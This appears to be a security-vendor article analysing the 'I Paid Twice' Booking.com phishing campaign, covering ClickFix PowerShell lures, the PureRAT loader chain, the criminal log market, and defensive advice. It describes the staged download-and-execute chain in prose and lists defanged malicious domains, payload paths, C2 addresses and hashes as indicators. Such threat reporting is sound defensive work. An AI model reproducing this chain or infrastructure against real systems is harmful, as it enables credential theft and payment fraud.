Booking.com Scam: “I Paid Twice” Phishing Campaign Targets Hotels and Guests Worldwide

The Booking.com scam labeled “I Paid Twice” is a global phishing operation that targets hotels and their guests by abusing compromised booking-management accounts. Criminals first breach hotel staff machines, harvest booking platform credentials, and then use those accounts to email or message real customers with convincing, reservation specific fraud. Victims receive messages that look legitimate and are directed to fake payment verification pages that harvest banking details. The final goal is financial theft, account takeover, and resale of high value extranet access on underground markets.

This Botcrawl deep dive explains the complete attack chain, from the initial infection of hotel staff to the distribution of phishing pages for guests. We cover the ClickFix social engineering tactic, the PureRAT loader and payload, the criminal marketplace that monetizes Booking.com account access, detection opportunities for defenders, and practical steps hotels and guests can take right now to stop the Booking.com scam.

How the Booking.com Scam Works

The Booking.com scam is a multi-stage fraud that follows a predictable escalation. First, threat actors infect hotel administrator workstations or compromise their email accounts. Next, attackers use the stolen credentials to send realistic messages to hotel staff or to hotel guests. The messages include links that redirect through a traffic distribution network to pages impersonating Booking.com or other booking platforms. When hotel staff or guests follow the instructions on these pages they are tricked into copying and executing a PowerShell command or entering payment data on a fake checkout. The PowerShell command downloads a staged archive, installs a loader, and runs a Remote Access Trojan called PureRAT. With PureRAT on the administrator machine, attackers harvest extranet credentials, monitor reservations, and send follow up phishing messages to guests or sell access to other criminals.

Why this Booking.com Scam Is Effective

• Contextual credibility. Messages contain reservation identifiers, guest names, and booking references that make phishing attempts look legitimate.
• High value targets. Booking extranet accounts control multiple properties and large volumes of active bookings, increasing the potential payoff to attackers.
• Professionalised criminal market. The full attack chain is supported by specialised services: traffers who push traffic, sellers of booking logs, log checkers, and phishing kit operators.
• Stealthy delivery. The ClickFix tactic uses redirection and short lived domains to hide payload infrastructure and avoid takedown.

From Hotel Compromise to Guest Fraud

The Booking.com scam often starts with one infected hotel workstation. That single compromise can cascade quickly. An attacker with access to an administrator account can read reservation details, send messages from a legitimate corporate address, and create believable guest communications. Those communications in turn lead victims to phishing pages that harvest banking information or prompt dangerous commands that install malware like PureRAT.

Typical timeline of the Booking.com scam

• Initial infection through phishing, malvertising, or exploit. Attacker gains foothold on an admin workstation.
• Credentials for booking platforms are harvested and validated. Valid extranet accounts are used to send fraudulent messages or are listed for sale.
• Guests receive messages claiming a payment problem and are directed to a phishing page. At least one real victim pays again, creating the “I Paid Twice” scenario.
• PureRAT and other stealers harvest more credentials and escalate access to other properties or systems.
• Logs and working accounts are sold on criminal marketplaces. Fraud servers harvest payments and resell data.

Malicious Emails and Messaging

Attackers use multiple channels to reach hotel staff and guests. Hotel administrators receive spearphishing emails that mimic Booking.com partner notifications. Guests receive SMS or WhatsApp messages that include reservation details and a claim that a payment or verification problem must be corrected. In every case the malicious message uses real reservation data to convince the recipient the communication is genuine.

Observed subject line templates used by the Booking.com scam include:

• New last-minute booking ({REF + DATE})
• New guest message in reference to your unit Tracking code {ID}
• New guest message about reservation Tracking code {ID}
• Payment verification required for reservation Ref {ID}

These templates are efficient because they match legitimate partner messaging patterns that hotels already expect to see. That lowers suspicion and increases click rates for malicious links.

ClickFix: Social Engineering That Forces a Command

A core component of the Booking.com scam is the ClickFix social engineering method. ClickFix pages impersonate platform support or partner tools and prompt the visitor to copy a text block. The text block contains a PowerShell command that victims are told to paste into a local terminal or run as an administrative fix. The social engineering is tailored to administrative staff, often framed as a urgent site maintenance or recovery step. When executed, the PowerShell command fetches and runs additional code from an attacker controlled server.

Redirection and TDS

Links in the phishing messages do not point directly to the ClickFix page. Instead they route through a redirection network. Each URL typically matches a short random path pattern such as:

hxxps://{randomname}[.]com/[a-z0-9]{4}

Those domains are part of a traffic distribution system that hides the final ClickFix location and helps the attacker avoid simple domain blacklisting. In many cases hundreds of throwaway domains resolve to a single IP. Some domains are benign or even pornographic to distract takedown requests. The net effect of the TDS is to make the ClickFix pages resilient and transient.

How ClickFix tricks administrators

• The page uses Booking.com style and wording. It may include admin or extranet strings in the URL to add legitimacy.
• A JavaScript routine checks iframe context and forces top frame navigation, preventing containment in a frame and making the page appear in the full browser window.
• The page prompts the visitor to copy a command and paste it into PowerShell. The text is presented as a support remedy such as clearing a failed payment or reissuing a voucher.

PowerShell Execution and Payload Delivery

When an administrator follows the ClickFix instructions and executes the PowerShell snippet, a staged download chain begins. The PowerShell command fetches a second stage script from a URL path, commonly ending in /bomla. That script enumerates system information, then downloads a ZIP archive into the current user profile, typically AppData\\Local. The archive contains a small executable and multiple DLLs. The script extracts files and schedules persistence via a Run registry key and a shortcut in the Startup folder. Finally, the executable is launched. The executable then side loads one of the bundled DLLs which acts as a loader. That loader performs reflective assembly loading and injects PureRAT or a similar implant into memory so the payload never appears on disk.

Why PowerShell is a preferred vector

PowerShell is built into Windows systems and is designed to be flexible and scriptable. Attackers take advantage of PowerShell for several reasons. First, it can download and execute content without leaving obvious artifacts. Second, enterprise environments often allow PowerShell by default for administrative tasks. Third, scripted PowerShell commands can be copied and pasted by social engineering victims in a way that feels familiar to support staff.

PureRAT: Capabilities and Threat

PureRAT is a modular Remote Access Trojan sold as a malware as a service. In campaigns connected to the Booking.com scam, PureRAT provides broad remote control and theft capabilities. Once loaded, PureRAT fingerprints the host, reports system details to C2 servers, and awaits plugin delivery. Observed PureRAT features include remote desktop control, keylogging, file collection, credentials theft modules, and plugin based exfiltration pipelines. PureRAT commonly communicates with C2 over TLS to evade inspection and uses custom ports to blend with legitimate traffic.

Operational details observed in the Booking.com scam

• PureRAT is often protected with obfuscation and packing to resist static analysis.
• It uses reflective loading so the malware may never be written to disk in plain form.
• Plugin modules can be pushed on demand to locate password stores, cookies, browser data, and file system targets such as reservation exports.
• Network activity typically uses encrypted transports on high ports such as 56001, 56002, and 56003.

Monetizing the Booking.com Scam

The Booking.com scam is profitable because attackers can monetize each stage. A single compromised extranet account can be sold for hundreds to thousands of dollars depending on its value. High value accounts are those that manage multiple properties, belong to high tier partners, or have active reservations with imminent check ins. Attackers also use compromised accounts to send credible fraudulent messages to guests and extract payment information directly. Finally, harvested guest payment data and PII are sold or used for further fraud.

Services that support the criminal ecosystem

• Log markets. Compromised extranet accounts are traded as cookies or credential pairs on private markets.
• Log checkers. Tooling to validate whether stolen credentials still work and to extract metadata about accounts.
• Traffers. Specialists who deliver traffic to phishing pages through social networks, paid ads, or SEO poisoning.
• Phishing kits. Reusable landing pages hosted behind fast changing domains and Cloudflare protections to resist takedown.

Guest-Facing Fraud: The “I Paid Twice” Scheme

Guest-focused phishing pages mimic Booking.com or other booking platforms and present a believable narrative: a payment verification problem, a billing error, or a failed card capture. The phishing page displays reservation details and asks the guest to re-enter their payment information. Because these pages are often protected by anti-bot services like Cloudflare Turnstile and hosted behind legitimate infrastructure, they look authentic and bypass simple defensive checks.

In documented cases, a victim paid the hotel at check in and later received a phishing message alleging a payment verification issue. The victim followed the link and re-entered their card details on the fake page. The attacker then used the card to withdraw funds or sold card details immediately on darknet markets. That is how the Booking.com scam earned the “I Paid Twice” label.

Technical Indicators and IOCs

Defenders should monitor for the following observable patterns linked to the Booking.com scam. Use these IOCs as part of a broader hunting strategy. Note that domains and IPs change quickly, but patterns such as the use of short random redirect domains, /bomla payload paths, and ZIP archive names like updserc.zip are persistent signals.

• Redirect pattern: hxxps://{randomname}[.]com/[a-z0-9]{4}
• Payload path often ends in /bomla
• Staged archive filename patterns: updserc.zip or similar
• PowerShell download and execution calls that fetch scripts from attacker domains
• Creation of Run registry keys and .lnk shortcuts in Startup folders
• Use of AddInProcess32.exe launching from AppData or Temp paths with unexpected network connections
• Encrypted C2 connections on uncommon ports such as 56001, 56002, 56003

Sample IOCs

Below is a non exhaustive list of indicators observed in the campaign. This list can be imported into detection tooling, but teams should verify signs in their own environments before action.

 Redirect and ClickFix domains (examples) headkickscountry[.]com/lz1y activatecapagm[.]com/j8r3 homelycareinc[.]com/po7r byliljedahl[.]com/8anf seedsuccesspath[.]com/6m8a PowerShell payload and staging ctrlcapaserc[.]com/bomla bknqsercise[.]com/bomla bkngssercise[.]com/bomla bkngpropadm[.]com/bomla emprotel[.]net[.]bo/updserc[.]zip cabinetifc[.]com/upseisser[.]zip Phishing landing pages targeting guests confirmation887-booking[.]com/17149438 verifyguest02667-booking[.]com/17149438 guest03442-booking[.]com/17149438 cardverify0006-booking[.]com/37858999 verifycard45625-expedia[.]com/67764524 PureRAT C2 examples sqwqwasresbkng[.]com 85.208.84[.]94:56001 77.83.207[.]106:56001

Detection Opportunities for Security Teams

There are multiple detection and hunting strategies defenders can apply to identify the Booking.com scam early in the chain. Focus on PowerShell usage, unusual persistence mechanisms, and anomalies in admin account behavior.

Hunt for suspicious PowerShell activity

• Search for command lines that include remote downloads. Flag PowerShell invocations that call Invoke-Expression or that reference short lived attacker domains.
• Monitor for processes that create .lnk files in Startup or create Run registry keys. These actions often indicate scripted persistence chains.

Watch for DLL side loading and unusual AddInProcess32 activity

Because the loader abuses legitimate processes like AddInProcess32.exe, use process parent-child relationships as indicators. Alert on AddInProcess32 when its parent process originates from user profile paths such as AppData or Temp. Correlate such events with unexpected network connections or certificate store access for stronger confidence.

Network level detection

• Monitor outgoing TLS connections on uncommon ports like 56001. Compare destinations against known malicious IPs associated with PureRAT C2s.
• Use TLS server name indications, certificate anomalies, and uncommon SNI values to detect suspicious encrypted channels.

Web content and phishing detection

• Block or scrutinize short lived redirect domains and common TDS patterns. Use reputation lists to capture throwaway redirectors.
• Detect pages that ask visitors to copy and paste terminal commands. This is a high fidelity signal of ClickFix style social engineering.
• Look for pages with admin, extranet, or booking patterns in the URL path that are not hosted on legitimate Booking.com domains.

Operational Recommendations for Hotels

Hotels and property management teams are the primary frontline in preventing and detecting this Booking.com scam. These steps reduce the risk of account compromise and stop the onward phishing of guests.

• Enable Multi Factor Authentication. Enforce phishing resistant MFA for extranet and administrative accounts. FIDO2 keys are preferred.
• Harden admin endpoints. Restrict extranet administrative access by IP whitelisting and VPN only access where possible.
• Limit privileges. Apply least privilege to booking platform accounts. Avoid shared credentials and centralised admin accounts that manage multiple properties.
• Replace plain text exports. Avoid exporting full guest payment details unless absolutely necessary. Tokenize and minimize PII exposure.
• Train staff on ClickFix tactics. Educate reservation and front desk teams to never paste remote commands into PowerShell or run unknown scripts. Simulate social engineering exercises periodically.
• Monitor third party access. Review which vendors or connectors have extranet access and rotate API keys and passwords regularly.
• Record and validate vendor notifications. Establish an internal channel to verify any partner notifications before acting on them.

What Guests Should Do Right Now

Guests are the ultimate victims in the Booking.com scam. If you receive a payment verification message or any suspicious communication that references a reservation, follow these steps.

• Do not click forwarded links. Instead, open your Booking.com app or the official booking site and check your reservation from there.
• Contact the hotel directly. Call the phone number on your reservation confirmation to confirm any payment issues.
• Do not paste or run any commands. Legitimate support will never ask you to run a PowerShell command to fix a booking.
• Monitor bank accounts. Check card statements for unauthorized charges and report suspicious transactions immediately.
• Run an antivirus scan. If you believe you clicked a phishing link, run a full system scan with Malwarebytes to check for potential credential stealing malware. Use this link to download Malwarebytes: Malwarebytes.

How Law Enforcement and Platform Operators Should Respond

Platform operators and law enforcement have complementary roles in disrupting the Booking.com scam. Booking platforms must accelerate takedown of phishing pages and close compromised extranet accounts. Law enforcement should prioritize high value sellers of extranet logs and traffer groups.

• Rapid takedown. Coordinate with hosting providers and CDNs to remove phishing pages. Use domain registrars and abuse contacts to eliminate infrastructure used for ClickFix and guest phishing.
• Freeze high value accounts. When logs indicate active fraud, freeze accounts managing multiple reservations and require reauthentication and verification.
• Trace sellers and buyers. Investigate marketplaces and telegram bots that automate log purchases. Disrupt the economy that funds these campaigns.
• Share indicators. Publish IoCs, redirection patterns, and payload hashes across CERTs and industry ISACs to help rapid detection and blocking.

Why the Booking.com Scam Will Continue Unless Disrupted

The Booking.com scam is profitable and low risk for attackers. The criminal market supplies tools and services that remove technical barriers, and the TDS approach protects infrastructure from takedown. Unless the criminal supply chain is disrupted, attackers will keep scaling the same model against other booking sites and travel partners. Payment card harvesting and credential resale remain lucrative, and every compromised extranet account can be monetized many times over.

Case Studies and Real World Impact

Investigations show multiple hotels in different regions reporting guest fraud and duplicated payments. In one verified case, a guest paid at check in and later also paid via a phishing page after receiving a WhatsApp message that included their reservation details. The attacker used the card twice within hours. The affected guest had to dispute the charges and cancel a credit card. The hotel lost customer trust and faced follow up inquiries from payment processors. That example illustrates how the Booking.com scam damages both guests and hotels.

Threat Hunting Playbook

Security teams looking to hunt this activity should combine host, network and email signal correlation. The following playbook offers practical steps to find signs of the Booking.com scam in enterprise environments.

• Email telemetry. Search mail logs for messages leaving from partner facing addresses that include booking patterns but lack expected headers or DKIM signatures.
• PowerShell history. Inspect PowerShell execution logs for commands that fetch remote scripts from short lived domains or that reference /bomla paths.
• Startup artifacts. Hunt for new .lnk files created in Startup locations and for Run registry keys created within a narrow time window.
• Process parent anomalies. Detect AddInProcess32.exe running under unusual parents such as AppData\\Local\\Temp locations.
• Network anomalies. Flag TLS connections to IPs that were not previously contacted, especially on ports linked to PureRAT C2s.

Hardening and Prevention Checklist

Use this checklist to reduce the attack surface that fuels the Booking.com scam.

• Apply least privilege and role based access controls to extranet accounts.
• Enforce phishing resistant MFA for all partner and admin accounts.
• Disable or restrict PowerShell usage for non administrative users. Apply constrained language mode where possible.
• Implement endpoint detection that watches for Run key creation, Startup shortcuts, and DLL side loading patterns.
• Monitor web traffic patterns and block known TDS redirect hosts.
• Train reservation staff to verify partner requests out of band and to report suspicious messages.
• Rotate API keys and passwords after any confirmed compromise and audit vendor access regularly.

Final Notes on the Booking.com Scam

The Booking.com scam is a commercialised criminal operation backed by a mature underground ecosystem. It combines social engineering, commodity malware, and specialised services to turn a single compromise into repeated profit. Hotels must treat their extranet accounts like crown jewels. Guests must treat unexpected payment verification requests with skepticism. Platform operators and law enforcement must target the marketplaces and traffer groups that keep this model profitable.

Botcrawl will continue to monitor the Booking.com scam and publish updates as new infrastructure and IoCs appear. If your organization needs help hunting this activity or validating indicators in your environment, contact our incident response team for guidance.

Extended IoCs and Notes

Below are the IoCs from the documented campaigns. As always these indicators change quickly. Use them as starting points for hunting and validation.

 Redirect and ClickFix examples headkickscountry[.]com/lz1y activatecapagm[.]com/j8r3 homelycareinc[.]com/po7r byliljedahl[.]com/8anf seedsuccesspath[.]com/6m8a Payload staging and PowerShell URLs ctrlcapaserc[.]com/bomla bknqsercise[.]com/bomla bkngssercise[.]com/bomla bkngpropadm[.]com/bomla emprotel[.]net[.]bo/updserc[.]zip cabinetifc[.]com/upseisser[.]zip Phishing landing pages confirmation887-booking[.]com/17149438 verifyguest02667-booking[.]com/17149438 guest03442-booking[.]com/17149438 cardverify0006-booking[.]com/37858999 verifycard45625-expedia[.]com/67764524 PureRAT C2 sqwqwasresbkng[.]com 85.208.84[.]94:56001 77.83.207[.]106:56001 File and hash examples observed in the loader MD5=D4845669F7F56C6C4EB82147A1F82615 SHA256=9BAB404584F6A0D9D82112D6E017CFA37D0094D97E510101D6A0132FD145DD32 IMPHASH=799E73863806DF2964D80D12CE4E61EA

If you use these IoCs, add them to a watchlist and correlate across email, proxy, endpoint, and DNS logs. Prioritize any hits that appear during the same time window as suspicious PowerShell activity or unusual AddInProcess32 behavior.

Resources and Reporting

If you or your hotel has been targeted by this Booking.com scam, take these steps immediately: change all booking platform credentials, enforce MFA, run a full endpoint assessment, and contact your booking platform account manager. Report the phishing pages to the hosting provider and to your national CERT. If you need forensic support Botcrawl provides incident response and hunting services tailored to hospitality sector threats.

For consumer protection, if you were defrauded through a Booking.com related phishing page, contact your bank and file a dispute. Report the fraud to local law enforcement and to your national cybercrime reporting agency.

Stay informed on Booking.com scam updates and broader travel sector threats at Botcrawl scam alerts and Botcrawl cybersecurity.

Thank you for reading. If you have IoCs, suspicious landing pages, or samples you want us to analyze, contact our team and we will prioritize it for detection and disclosure.